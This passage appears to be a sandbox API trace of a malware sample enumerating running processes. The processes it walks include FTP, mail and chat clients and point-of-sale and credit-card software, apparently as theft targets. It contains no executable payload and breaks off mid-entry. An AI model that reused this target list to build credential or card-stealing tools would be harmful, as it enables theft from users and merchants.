Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0268.550] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0268.552] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0268.553] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0268.555] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0268.557] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0268.559] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0268.561] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0268.562] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0268.564] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0268.566] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0268.567] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0268.569] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0268.571] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0268.572] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0268.590] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0268.592] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0268.594] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0268.596] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0268.598] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0268.600] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0268.603] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0268.605] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0268.607] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0268.610] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0268.612] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0268.614] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0268.616] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0268.618] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0268.620] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0268.623] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0268.625] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0268.627] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0268.628] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0268.630] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0268.632] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0268.634] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0268.636] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0268.671] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0268.674] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0268.675] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0268.677] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0268.679] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0268.681] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0268.682] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0268.684] CloseHandle (hObject=0x758) returned 1 [0268.684] Sleep (dwMilliseconds=0x64) [0268.802] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0268.812] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.814] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.815] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.816] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.818] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.819] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.821] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.822] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.823] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.825] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.826] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.828] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.830] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.831] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.833] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.834] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.835] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.837] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.838] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.858] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.859] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0268.861] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0268.862] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.864] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.865] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0268.867] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0268.869] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0268.870] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.875] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0268.877] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0268.878] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0268.880] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0268.881] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0268.883] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0268.885] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0268.886] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0268.888] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0268.890] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 